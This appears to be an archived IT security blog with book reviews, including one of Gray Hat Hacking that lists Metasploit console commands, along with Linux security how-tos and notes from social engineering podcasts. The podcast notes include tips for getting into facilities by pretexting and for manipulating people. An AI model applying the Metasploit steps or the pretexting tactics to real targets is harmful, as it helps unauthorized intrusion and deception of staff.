Gray hat hacking: The ethical hacker's handbook - Book review

The following is a brief [and biased] review of the pages of Grey Hat Hacking (2nd edition - 2007). In one sentence, I would borrow the book from a library to read it. Alternatively, I would buy it, read it and sell it afterwards. 

Disclaimer: These lines do not substitute the reading of the book. They are meant to provide a global overview of what the reader can find in the book. My kudos to the authors, writing a book is always a big effort. And even a greater effort if the books talks about a changing target as IT security / software analysis. 


The book: Gray hat hacking: The ethical hacker's handbook.
The authors: Shon Harris, Allen Harper, Chris Eagle, Jonathan Ness .
Publication year:  2007 - Second edition.
Publisher: McGraw-Hill.



chapter 1 ethics of ethical hacking
A very generic chapter, useful to read across and set the global scene. If you need to justify work in IT security - well structured and referenced such for example page 10 - the origin of the word hacker and ethical hacker. Clear statements such as security does not like complexity [however, I would add, we live in a complex world].

chapter 2 ethical hacking and the legal system
A summary of US laws related to IT security, for example the US Federal computer crime statutes and some acts like:
18 USC 1029, 18 USC 1030, 18 USC 2510, 18 USC 2701, Digital Milenium Copyright Act and Cyber Security Enhancement Act.

chapter 3 proper and ethical disclosure
A helicopter overview about ethical disclosure. They mention the month of the PHP/Browser bugs, the story of Michael Lynn and CISCO and refer to the CERT/CC vulnerability disclosure process of 45 days. The Organisation for Internet Safety and the Zero Day Initiative (by Tipping Point, owned by 3Com).

chapter 4 metasploit
It is a nice approach to launch and to own a box by learning how to use metasploit. They provide a thorough description of the use of the console and auxiliary modules. They start with a simple example, an unpatched XP Service Pack 1 machine missing the RRAS security update, mentioning first the basic use of basic commands to start with:

show
info
use
help
show options
set RHOST ipaddress
show payloads
set PAYLOAD payload-name
show options
show targets
set TARGET 1
exploit
info
show auxiliary
use option
show options
sessions -l
sessions -i number

and - second, exploiting client-side (browsers, email apps, media players, client sw in general) vulnerabilities with metasploit

A useful hint, to return to the metasploit console prompt we can use ctrl-z.
I would also highlight a curious comment: they mention that this way you can attack workstations protected by a firewall

I find very interesting the description they provide of meterpreter, a command interpreter to inject payload into the memory of the exploited process.
Meterpreter has core commands, file system commands, networking commands, system commands, user interface commands, making ven possible to migrate from one process to another.

They conclude this chapter with the use of metasploit as a man in the middle password stealer, configuring metasploit as a malicious SMB server. They also touch briefly cain (the password stealing tool) and finally they briefly refer to the link with nmap or nessus with db_autopwn and provide a brief description of what is inside a metasploit module.

chapter 5 - using backtrack
They talk about backtrack2. This chapter shows us how quickly things happen in the security arena. Their point on the usefulness of isorecorder and how to make changes in the distribution and make them persistent is somehow now outdated.

Part 2 of the book is called pen testing and tools - This name is a little bit misleading.

chapter 6 programming survival skills
I took with me: the year 1972, when Dennis Ritchie invented C, that Intel processors are little endian and Motorola are big endian. And some memorty related concepts:

- bss section is the below the stack section - to store global non initialised variables - the size is fixed at runtime
- heap section - to store dynamically allocated variables, it grows from lower addressed memory to higher addressed memory allocation of memory is controlled through malloc() and free() functions
- stack - used to keep track of function calls and grows from higher addressed memory to lower addressed memory - local variables exist in stack section

[ I think there is a typo, a 5 should be an index variable in page 131]

I also read the ATT assembly is normally used in linux and NASM is used by many windows assemblers and debuggers.

The chapter ends with assembly and python. Python objects are data types such as strings, numbers, lists, dictionaries and files dictionaries are similar to lists but their objects are referenced by a key. I like the python part - easy and to the point

chapter 7 basic linux exploits
You can read that a stack is FILO and some points on the importance of address space layout randomisation. I also took with me that perl is interpreted [e.g. perl -e 'print "A" x 600'] and that python is an interpreted object oriented language.

They mention sticky bits and the fact that shell code is actually binary. They keep providing valuable input regarding the memory:

- environment and arguments are stored in an area above the stack
- eip poins to the next instruction to be executed
- in metasploit we can find locations of opcodes with msfelfscan

chapter 8 advanced linux exploits
This chapter shows how to calculate the locations to overwrite the heap with buffer overflow exploits. They show how these techniques require time and effort. They explore the Windows debugger - from page 250 - and some point in OllyDbg on page 255. Important point, OllyDBg only works in userspace. For kernel space, we need to use another debugger like WinDbg. The end briefly mentioning the metasploit opcode database.

chapter 9 shellcode strategies
This is a very verbose and theoretical chapter. They include the use of gdb (debugger) and gcc (compiler) and mention the important role of objdump to get the shellcode.

chapter 10 writing linux shellcode
Interesting tips, the use of nasm -f elf, ld -0 and I think there is a typo on page 231.

chapter 11 basic windows exploits
This chapter states that Linux and Windows are driven by the same assembly language. The Microsoft C/C++ optimizing compiler and linker is touched upon,
cl.exe, together with cdb, ntsd and windbg.

chapter 12 basic passive analysis
The text turns now to present source code audit tools such as ITS4, rats, flowfinder and plint and a decompiler for Java named Jreversepro, stressing the importance of checking all user supplied data.

Code analysis tools mentioned in this chapter are:

- IDA pro as a powerful disassembler
- hex-ray (an IDA pro plug-in) as a decompiler
- binnavi - a graph-based analysis and debugging tool- binary code reverse engineering tool that was built to assist vulnerability researchers who look for vulnerabilities in disassembled code

and some other tools like:
- bugspam (an IDA plugin)
- chevarista (a static analyser)
- bindiff (useful to compare binaries and patched binaries)

chapter 13 advanced static analysis with IDA Pro
This chapter shows us that stripping a binary means removing all symbol information. We can also read that to learn what dynamic libraries an executable depends on, we can use dumpbin in WIndows, ldd in Linux and otool in Mac OS X. Additionally, this chapter also mentions:
- the fast library acquisition for identification and recognition (flair)
- the use of pelf and sigmake
- how to perform a manual load of program headers
- IDA's scripting language, IDC
- IDA plug-ins
- and finally, a brief reference to pro loaders and processor modules

chapter 14 advanced reverse engineering
This chapter starts with a nice statement: stress testing for SW developers is what vulnerability researchers call fuzzing. The tools they propose to use are:
- debuggers like gdb
- code coverage tools like process stalker
- profiling tools
- flow analysis tools
- menory use monitoring tools like valgrind, a memory debugging and profiling system
- and finally, fuzzers like SPIKE

chapter 15 client side browser exploits
This chapter mentions the concept of spear phishing (APT or targeted attacks are now the trendy name). As fuzzing tools, they propose:
- mangleme from freshmeat.net
- axfuzz and axenum - to check appearances of install, writeregval, runcmd, gethostname, rebootmachine
- AxMan and Internetexploiter
As a little detail, they use something called the "mark of the web" to make Internet Explorer behave as if we would be browsing external Internet zones.

chapter 16 exploiting Windows access control model for local elevation of privileges
These pages talk about SIDs and Access Tokens, Access Control Entries, SYstem ACLs and discretionary ACL while using some of the not so popular sysinternals tools.

chapter 17 Intelligent fuzzing with Scully
This chapter refers to the importance of protocol analysis in effective fuzzing. For that, they porpose the use of the Sulley fuzzing framework.

chapter 18 from vulnerability to exploit
As the title indicates, this chapter refers to the steps necessary to construct payloads (and the need to find the eip, the instruction pointer).

chapter 19 closing the holes: mitigation
Three concepts are described and discussed in this chapter: patching, binary mutation and third party patching.

chapter 20 collecting malware and initial analysis
They talk about malware and honeypots, the possibilities to avoid VM detection and the usefulness of honeyd and nepenthest. Names of tools proposed in this chapter for malware analysis are PEiD, UPX, strings, regshot, filemon, process explorer, process monitor (they don't mention this one but I do, together with capturebat log viewer), norman sandbox and map (malcode analysis software tool) from idefense.

chapter 21 hacking malware
More content yet on unpacking using PEiD, LordPE, IDA and Olly plugins and additional content on malware analysis.

Happy grey hacking reading!

Public DNS servers: Less privacy in exchange of a security layer

There are several free public DNS servers on the Internet. Google, Scrubit and DNSadvantage are some of them. OpenDNS is the one I have selected to test in Ubuntu for a while. They offer web content filtering and basic protection against known phishing, botnets and some known worms.


Inserting in the /etc/resolv.conf the OpenDNS name servers is an easy task: Their name servers are 208.67.222.222 and 208.67.220.220. If you are using DHCP, add those name servers, separated by a comma, in the file /etc/dhcp3/dhclient.conf, using the following line:
prepend domain-name-servers 208.67.222.222,208.67.220.220;

There are however some additional steps to take if our ISP uses a dynamic public IP address. OpenDNS provides a simple utility for those using MS Windows or MacOS. In Linux, we have to follow the next steps. After visiting several sites that provide input on this scenario (e.g. in Ubuntu docs or in the ddclient site), I summarise only those effective valid steps:
0. Sign in to the OpenDNS site, create your network and configure your security and content filtering settings.
1. Install ddclient e.g. in Ubuntu
$ sudo apt-get install ddclient
2. Configure the file /etc/ddclient.conf in this manner
ssl=yes
daemon=300
protocol=dyndns2
use=web
server=updates.opendns.com
login=yourlogin
password=yourpassword
yournetworknameintheopendnssite


3. If there is a /var/cache/ddclient/ddclient.cache file, erase the "ip=" segment [although you can skip this step]

4. Now it is advisable to
4.1 Test ddclient using the command line
$ sudo ddclient -daemon=0 -noquiet -debug
4.2 Start the daemon at boot up by writing in the file /etc/rc.local the line
/usr/sbin/ddclient -daemon 300 -syslog
before exit 0.

5. The ddclient daemon can be stopped with
sudo killall ddclient
or started with
sudo /etc/rc.local

And ready to surf! Now they will gather all the sites you visit (privacy loss). However, that was already the case wih your ISP's name service.

These "secure" name servers can constitute an additional security layer for home browsers, provided that they require a naming service. However, if they type an IP address directly (or a trojan within their box), then there is no additional security layer. Sites like this one can provide the IP address of a site directly.

A little final note: These OpenDNS services, web filtering and basic phishing protection, take around 5 minutes to get updated with a new IPaddress. Take that into account, the first 5 minutes of use of your browser will provide "unprotected" web surfing.

Happy name resolution! (and happy to read your comments)

Little addendum triggered by a cunning comment from a committed reader: An alternative to the use of these public DNS servers is running your own DNS server, configured to obtain names from the Internet root domain name servers. Certainly, a better alternative from a security standpoint. However, this option is only viable for those IT savvy individuals with sufficient skills, and resources, to run their own name service.

Network Flow analysis by Michael W. Lucas - Book review

Management schools teach you that someone or something is effective if they do the right things and they are efficient if they do the things right. The book "network flow analysis" by Michael W. Lucas (edited by no starch press and available in Amazon) is effective, it shows the thing you need to know about netflows, and efficient, it has the right lightweight format, although sometimes I have missed some explanatory drawings for those who learn visually.



The book is divided into an introduction and 9 chapters. Michael first explains the reason of the book in the intro and the difference between what network management tools give to the network expert and what working with network flows can provide.

I started then the book with chapter 1, where I really appreciated that the flow system architecture is right after the definition of a network flow. This avoids confusion and saves time to the reader. Actually, this topic of saving time to the reader and leading them to the point is a constant throughout the entire book. As a little suggestion, I would have added in this chapter a little disclaimer for the reader stating that some TCP/IP networking concepts should already be known by the reader (well, actually, surely readers will be network specialists).

Chapter 2 is the howto 101 to install and start operating with network sensors and collectors using the free flow-tools available in Google code. As a side note, I really liked to see in the book real command lines. This is the reason why I will keep the book close to my machine; it can really be used as a basic manual to install softflowd as a software-based network flow sensor and flow-capture as a flow collector. In addition to this, it was good to be reminded that the -arp switch in ifconfig enables a network interface without participating in arp.

Chapter 3 introduces the use of flow-cat and flow-print to view flows. In this chapter the junior network admin starts realising the potential value of net flows. My only "but" for this entire chapter is the reference to hexadecimal output. For future editions, I would propose to highlight and insert a little explanation when talking about flow-print -f 0 adding interface numbers by printing port and protocol info in hex.

Once the foundations have been laid out, chapter 4 refers to real life aspects of net flows such as filtering. For that, Michael proposes the use of flow-nfilter, building filters out of primitives, knowing that each primitive can only include one type of match. The bonus point for this chapter would be a nice little diagram showing how primitives relate to filters.

Chapter 5 follows the logical thread started by chapter 4: After filtering comes reporting. Actually, this is also a constant feature in this book. The reader never gets lost. It is easy to understand and follow the proposed script along the pages of the book. We learn how to use flow-cat in combination with flow-report and, later on, with flow-nfilter. This is one of the strong points of Michael's book. It is sure that smart network admins will come back to chapter 5 (and 6) regularly during their work time.

Chapter 6, at first glance, can be seen as hard core: Perl comes into the picture! However, Michael gives effectively readers through the jungle of installing Cflow.pm, so that FlowScan can work, while mentioning useful tools such as flowdumper, a tool that shows everything in the flow record. This chapter also mentions the difference between FlowScan and CUFLow.

Chapter 7 presents a collection of three tools: FlowViewer, FlowGrapher and FlowTracker. The first one is a web interface for flow-print and flow-nfilter, optimal mainly for network admins. The second one uses arbitrary flow data and the third one generates RDD-graphs based on flow data. This chapter introduces these tools and provides a basic manual, enough to start playing with them. Probably chapters 7 and 8 could trigger an entire new book on visualising net flows.

Chapter 8 is the step by step basic manual to use gnuplot, the generic graphical representation tool in Linux, in this occasion, certainly, for network flow data, but in itself, this chapter is a useful guide for anyone willing to start off "the gnuplot experience".

Chapter 9 belongs to the "swiss army knife" subset of this book (together with chapters 5 and 6). Once everything is installed, implemented and running. What do we do with it? Well, this chapter answers this question in a very practical way.

I have released a series of tweets (http://twitter.com/itsecuriteer) with a small number of valuable pearls coming out from reading this effective book. All in all, I agree with Mr. Bretjlich's comments about the book (see http://taosecurity.blogspot.com/2010/08/consider-reading-network-flow-analysis.html): A five-star book on network flows.

Finally, a little piece of advice, please read the afterword on page 189, where the author refer to key non-technical skills that all admins should have (and practise ;-)

Happy October reading!

Truecrypt and USB drives

Human beings lose things. Laptops, smartphones and USB memory drives are things. We also lose them (see e.g. this piece of news). The data that any IT related hardware item can carry is often more valuable than the hardware itself. Truecrypt is a valid option to encrypt "losable" devices. This way, a third party would have a more difficult time to reach data stored e.g. in a USB memory drive. 




Truecrypt exists for Linux, Mac OS and MS Windows (where there is also a portable version - however requiring local admin rights). Once it is installed, its GUI looks like this:


It can use both a file or an entire partition as encrypted container. Both options can be mounted in the system and all data stored there will be encrypted at rest. The symmetric encryption algorithms that Truecrypt can use are the following. According to speed and crypto strength needs, the use of AES is the recommendable option:


However, remember that the security of your container relies, not only on the strength of the encryption algorithm used, but also on the strength of the password used as authenticating credential. The tool also allows for the use, together with a strong password, of a keyfile, so that both elements are required to decrypt and use the container (it there is the need to base authenticating credentials, not only on something you know, but also on something you have).

Little note: If you need to encrypt a set of already existing files, then you first need to create an empty container, and afterwards, move the files there.



Final catch: The drawback of using Truecrypt to encrypt your USB memory drive is that you need Truecrypt executed whenever you use your files. The advantage, if your USB memory drive is lost, your data will be safer. Up to your risk management decision ;-).

Happy secure data transport!





Free of charge web-based photo geo-location - Exif data cleaning

Digital photo files contain exif data. Typical items within exif data are camera model, date and time of the picture, and, if taken with a GPS-enabled device, also the GPS coordinates where the photo was taken. If that is the case, how can we geo-locate a picture?

The Exif Firefox Add-on is an easy way to read exif data. Once you have access to the GPS coordenates, the process is easy. Here we present the steps to geo-locate free of charge (and web-based) a photo:

From GPS coordinates to a real physical location:
- Go to tomtom routes and add the GPS coordinates as shown below,
For the reverse process, from a real physical location to GPS coordinates:
- Go to gpscoordinates.eu and enter the physical location as shown below,

A quick way to delete exif data in your pictures is opening them with GIMP, the GNU Image Manipulation Program, and saving them again unticking the advanced option of "save exif data".

Happy geo-location!


Sound in Ubuntu 10.04 - Security videos and podcasts

Willing to enjoy security videos or podcasts such as the following ones?

Videos
- irongeek
- owasp
- schmoocon

Podcasts
- pauldotcom
- risky business
- eurotrash
- social engineer

... and, for whatever reason, your new installation of Ubuntu 10.04 does not provide you with sound in your laptop or desktop? Try this one:

user@machine:~$ sudo apt-get install gnome-alsamixer

user@machine:~$ gnome-alsamixer

This alsa-related sound app offers you a way to, usually successfully, control your speakers and micro in an easy manner. Pay special attention to the PCM control feature.

Happy listening!

By the way, does your machine enter into power saving mode while watching security videos? That is annoying. Try caffeine, a little python app.



Itsecuriteer in twitter

Starting IT security and IT tweets here
Happy following ;-)

Decrypting AES-encrypted zip files

7-Zip, available here with a GNU LGPL license, is capable of encrypting and decrypting with AES while compressing and decompressing files.
Once you install 7z in a Linux box (e.g. with the command line $ sudo apt-get install p7zip-full), the entire documentation on how to use the tool can be found locally in the path
/usr/share/doc/p7zip-full/DOCS/MANUAL/index.htm .

Some examples of command lines:

- to decrypt all docs while decompressing a zip file:
$ 7z e Zipfilename *.doc -r
- to create an encrypted zip file (or to add to an existing one):
$ 7z a Zipfilename -ppassword file.tozip
- to extract an encrypted zip file:
$ 7z x Zipfilename -ppassword

Happy 7z use!

Security Bloggers Network

Dear readers,
This blog is now reachable from the security bloggers network. If you go to their site, the link appears on the right hand side, in the list of contributors.
Thanks to Alan Shimel, Chief Executive Officer of The CISO Group.


IT Security Management book


IT Security Management
How to set up an IT Security function

After long months and long hours of research, writing and editorial work, there is a new book I recommend on the topic of IT Security Management and how to create, grow and develop an IT security team while providing business value.

There is an extensive bibliography delving into the field of IT Security, from very technical aspects to information governance. However, there are not so many titles with both a technical and a human vision on how to create an IT security team, a team of IT Securiteers.

It is published by Springer within their Lecture Notes in Electrical Engineering series. This book is a key component to build the syllabus of a Masters Degree in Information Security or IT Security Engineering.

Its title is "IT Securiteers: How to set up an IT Security function".

You can find it, together with a brief intro, in the publisher's site - Springer - and in Amazon, among other sites.

Happy reading!
(Certainly, any comment on the content, feel free to drop a comment here!)

You can also "follow the book" in twitter @itsecuriteer.


The following words come from the publisher's site:

IT securiteers - The human and technical dimension working for the organisation Current corporate governance regulations and international standards lead many organisations, big and small, to the creation of an information technology (IT) security function in their organisational chart or to the acquisition of services from the IT security industry. More often than desired, these teams are only useful for companies’ executives to tick the corresponding box in a certification process, be it ISO, ITIL, PCI, etc. Many IT security teams do not provide business value to their company. They fail to really protect the organisation from the increasing number of threats targeting its information systems. IT Security Management provides an insight into how to create and grow a team of passionate IT security professionals. We will call them “securiteers” . They will add value to the business, improving the information security stance of organisations.

Social engineering lecture by Kevin Hogan

The episode number 9 of the Social Engineer podcast features an interview with the author and body language expert Kevin Hogan. Among other books, he has written "the psychology of persuasion". This is a post with learning points extracted from his words on persuasion. Here you are (most of them are close to literal, or slightly summarised, statements from Mr. Hogan):

Minute 17: Let's try to use the right words. Emotions are attached to words. The listening of some words (e.g. terrorist, malware) triggers, unconsciously, the release of cortisol and adrenaline in our brains.

Minute 22: "When people smile too much ...[]... we put a question mark".

Minute 23: Keep yourself a handshake's distance away in face to face communications (for liking and acceptance). A smaller distance calls for a negative answer from our counterpart. People tend to have an affinity for mirroring (e.g. same first name, same voice, same clothes): "The reason why I know he is a genius is because he thinks like I do" (min 25).

Minute 24: "Women really pay attention to shoes ...[]... women are really discriminative about men in general".

Minute 25: Identifying badges. If you want to pass unnoticed, leave all necklaces and unique accessories at home. And the opposite, if you want to be remembered, show that unique tattoo you have.

... for right-handed people... (for lefties, the sides mentioned will be the opposite)

Minute 26: Right-hand handshakes. In general, when you look up to the right, the left brain hemisphere is more active. And this side is more logical and sequential.

Minute 27: The right part of our brain is mostly biographical (and unconscious), full of unpleasant memories. Not recommendable to be highly active when we first know someone.

Minute 29: If you want to cause a right impression, sit close to the tidiest side of the desktop, which, in right-handed people, is usually the right side. Avoid the chaotic side of the table.

Minute 33: Sit down at ease and look with your eyes to the right. No problem! Look now to your left. Do you feel like ending with that look? And do you notice fear, sadness, anger?

Minute 36: Left and right. Generic statement: If you put your earphone on your left ear, you will have a more emotional conversation than if you place it on your right ear.

Minute 39: Microexpressions. Do not force a smile, they will all discover it. A phony smile creates discomfort (min 42).

Minute 42: Human beings look for simetry. "Simetry is easy to fake... by keeping your lips slightly apart". Keep this posture in photographs.

Minute 46: A look of curiosity opens more doors that a smile.

Minute 50: "Men are territorial". If a man sits close to a woman for longer than 5 minutes, he becomes her protector.

Minute 55-57: Access any facility appearing that you belong to it. "When trying to enter any facility, a cleaning man with a mop and a bucket is never stopped ...[]... or carrying the internal magazine ...[]... or carrying a company box ...[]... or asking for John".

Minute 57: "If you look angry, nobody would stop you [at the entrance]".

Minute 60-61: "Most people are in auto-pilot within their role". Keep them in auto-pilot within their role and your social engineer compromise would work. Do not raise any flag.

Minute 64: Most of the people would like to keep on being comfortable in their roles.

Minute 65: Reading an email. 50% of the content of any email you send is already on the mind of the reader. Emoticons could create a nice initial context.

Minute 67: "People are terrible at understanding risks".

Minute 69: If you need to obtain information, better than asking how are you, ask what are you up to?

Minute 72: The more real something looks, the more tangible and credible something seems e.g. a testimonial with a real name says much more than an anonymous testimonial.

Thanks to Mr. Hogan and to the social-engineer.org crew again!




Social engineering lecture by Dr. Ellen Langer (Harvard University) - Part II - Learning conditionally

The episode number 7 of the Social Engineer podcast features an interview with Harvard psychologist Dr. Ellen Langer. This is a second post with learning points extracted from her words on mindfulness. Here you are (most of them are literal, or slightly summarised, statements from Ms. Langer):

Minute 20: Expectations. Someone publishes in a newspaper an ad asking for a 1 USD banknote. He made a lot of money. Many people just sent the dollar. They were expecting something nice in return. Actually, our brain is wired to expect that.

Minute 21: There is nothing better to provoke rejection than stating: " What you have to do is..." We do not like to be told what we have to do. However, we welcome requests.

Minute 22: The foundations of manipulation rest on offering a choice to the interlocutor. The manipulator's task will be to guide them through the choice. E.g. "[adapted]...If you would like your child to have eggs for breakfast, just ask her how would she like the eggs and not whether she would like to have eggs for breakfast".

Minute 23: A second opinion does not matter very much. We associate the word second with something less important.

Minute 25: If you need 20 minutes from someone who is really busy, start asking something along these lines: "Could you devote me two hours this afternoon?" They will answer "No way". And then you introduce your real request: "What about you give me 20 minutes?".

Minute 28: The question determines the answer. Compare these two questions:
- Why am I a failure?
- Why am I a success?

Minute 29: Another example of framing, look at these two sentences:
- You are wonderfully spontaneous.
- You are terribly impulsive.
We refer to a similar reality but within different frames. People always try to confirm hypothesis.

Minute 35: The role of people in messages, especially in messages asking NOT to do something. Two cases:
- Keep off the grass.
- Ellen says keep off the grass.
We tend to follow de-personalised messages (first case) more than personalised messages (second case).

Minute 37: (Almost) everything we experience is the result of a previous decision. Once the decision is made, most of those decisions are accepted mindlessly.

Minute 39
: Mindlessness maintains the "status quo".

Minute 45: Information has no single understanding. This statement can be applied to fight against stress. Stress is a way to understand reality.

Minute 47: Learning conditionally: "This could be a table rather than this IS a table".

As mentioned already in part 1, this content is excellent - thanks to Ms. Langer and to the social-engineer.org crew!

Social engineering lecture by Dr. Ellen Langer (Harvard University) - Part I

The episode number 7 of the Social Engineer podcast features an interview with Harvard psychologist Dr. Ellen Langer. I have noted down some learning points extracted from her words on mindfulness. Here you are the first ones:

Minute 10 - More than 50% of current attacks to information systems are done through social engineering (from the social-engineer crew).

Minute 12 - Most of us, most of the time, are not consciously "present", in a state of "mindlessness", i.e. we set our brain in a kind of automatic pilot.

Minute 13 - The value of "empty requests" and the power of the word "because".

If we go to an office and ask the question... may I use the photocopier? We will get a less positive answer than if we use the following question: May I use the photocopier to make some copies?

Minute 14 - By using common "cultural switches", such as ...may I use the photocopier to make some copies?.. communication emitters tend to produce in communication recipients exactly the "typical or common answer".

Applied to social engineering, this means that the social engineer needs to engage the victim into a "common and known routine".

Minute 15 - "When we are not there, we are not there to realise that we are not there" - A game of words to define mindlessness.

Minute 16 - An example of "mindlessness". Try this game: Ask someone next to you to add these numbers. Tell the numbers one by one...

- one thousand
- forty ... and she will reply 1040

- one thousand ... and she will reply 2040
- thirty ...and she will reply 2070

- one thousand ...and she will reply 3070
- twenty ...and she will reply 3090

- one thousand ...and she will reply 4090
- ten ...and she will reply...
... 5000 or 4100?




"When there is something familiar, we respond typically in a mindless way. The reason we do this is because we overwhelmingly seek certainty and certainly leads to mindlessness (...) We should be learning in a more conditional way" (Ms. Langer)

Thanks to the social-engineer.org site for this great podcast!

Happy April!

Process explorer vs process hacker

I have been playing with process explorer and with process hacker. I initially wanted to select the best of the two but I will finally keep and use both to identify running processes (and compromised workstations). Why?

- Both tools are useful pilot light-alike tools for your e.g. MS Windows XP or 7 computers. They provide useful information on which processes are running real time on the machine.

- Both tools help identifying what a specific process does in the machine. They complement each other.




In process hacker:

- You can inject your own dlls on a running process.
- The network and the services tabs, in the main panel, help overseeing all existing network connections and services.
- You hace access to all tokens related to a process and to all registry keys in use (also in process explorer through the lower pane).
- There is even more process related information than in process explorer.
- You can create your own service and look for hidden processes.
- You don't need to install .net in your machine (since version 2).
- There is a portable app version.

But...
- You need(ed) to install .net in your machine. [Well, not anymore - thanks to Mantas for the comment]

In process explorer:

- In the process properties option, you can perform a strings command on the process (which is useful to identify specific pieces of code). You can also do this in process hacker but it is a little more hidden in the memory tab - search string.
- The "find process" functionality is really handy. Just place the moving target on the window you wonder which process it is and it identifies the process.
- There is also a portable app version.
- Less functionality sometimes means more clarity.


But...
- You have access to network information per process, but not in the main panel.

All in all, I am happy to rectify but I would say that process hacker provides everything that process explorer brings plus an additional set of goodies.

Happy March!

ps By the way, little note for the readers of this blog. If you are a passionate IT security professional, able to work in English and willing to relocate in Central Europe for some months while adding undoubtful technical Infosec value to your CV, please contact me (an email address always appears in this blog's main page).

Book review: "Leading geeks" by Paul Glen

I have just read the book by Paul Glen titled "Leading geeks". Following the spirit of expert book review sites, such as the one from Mr. Bejtlich, here you are some comments about "Leading geeks".

The subtitle of the book is "How to manage and lead people who deliver technology". It has been published by Wiley.

First things first, this review by no means replaces the reading of the book. On the contrary, I hope that by reading these lines, this book would have more readers. You can buy it, for example, here.

I summarise my view on this book saying that ... It is a book worth reading, Although the first half contains more aha! thoughts than the second part.

Mr. Glen starts with an interesting comparison between power and leadership. He defines leadership as "a special type of power relationship in which both leaders and followers are mutually influential for their mutual benefit".

I understand that his definition of geek is someone who works with technology. He continues with a splendid series of sentences: "...for a geek, to reason is to know, to know is to be certain, to be certain is to be right, and to be right is to be safe" (page 28). I like when Mr. Glen mentions that geeks use the "problem-solution" model (page 29) as a tool to tackle almost any situation. This constitutes already a first difficult point for geek managers (page 124): They need to perform some activities, such as facilitation and information sharing, that do not fit in the problem-solution model.

He also refers to the fact that geeks are not obliged to sharpen their social skills. Most of the value they deliver comes from actions that are not related to behaviour (page 13) . This is an important point that we, geeks, have to bear in mind (and improve).

"Geeks think self-expression is communication". You can read this on page 34. I invite you to reflect on this sentence and how current education systems promote this fact. Also an interesting point is the fact that most unprofessional behaviour happens when people are under pressure (adapted from page 134).

The author states that geeks judge colleagues in a swift and merciless manner. I doubt whether I entirely agree with this, but I certainly have this in mind when I hear some judgements around me coming from geeks.

I certainly agree with the statement that we, geeks, pay more attention to the way a system works than to what a system does (page 39).

Page 62 in the book shows also a critical difference between geek and managerial work. The former requires no interruptions and the latter is mostly based on interruptions. This is a second difficult point then for geek managers. They need to change their daily way of operation.

On page 76, the author proposes 12 competencies for geek or geek managers. It is interesting to note how the needs to manage ambiguity and time horizons are part of that list of competencies.

Especially interesting is his definition of politics (page 86): "The process by which a group of people makes a decision". I link this, first, with the recommendation that the author makes to provide clarity to the environment (page 174), so that geeks are able to understand what they work for. And second, I link it with how a decentralised manner to make decisions require information sharing (adapted from page 173).

All in all, I enjoyed reading the book. I could take several thoughts and models for daily professional geek work.

If there is an IT or IT security related book you would like a review about, please leave the name in a comment and I will endeavour to read it.

Thanks to Paul Glen for his enlightening book.

Increasing online availability levels

Confidentiality, Integrity and Availability. The CIA acronym is always present in Information Security. The three key security properties that any piece of information has.

This post focuses on increasing availability in a specific scenario: We need to access the Internet and we do not trust the hard disks (maybe they are infected by a piece of malware, maybe there is a keylogger already installed...) of our computer.

Ubuntu releases (e.g. 8.10, 9.04 and 9.10) provide the possibility to create a Startup USB drive with some persistent space to store configuration settings and documents.

The drawback of being persistent is that the risk of infecting also the USB drive exists. However, the advantage of persistence is that we can configure it beforehand so that the Ubuntu installation on it is already aware of our router and network configuration. This is specially welcomed if the ultimate user of the USB drive will be an IT layman.

How to do it? Download the iso image preferred to be installed in the USB, go to System, Administration, USB Startup Disk Creator functionality (option present in Ubuntu 9.04 and 9.10) and configure the wizard similarly to this screenshot.



Keep the newly installed USB drive in a safe place and test it every regularly. One unexpected day, it could become the key to have Internet access available.

Happy New Availability (and 2010)!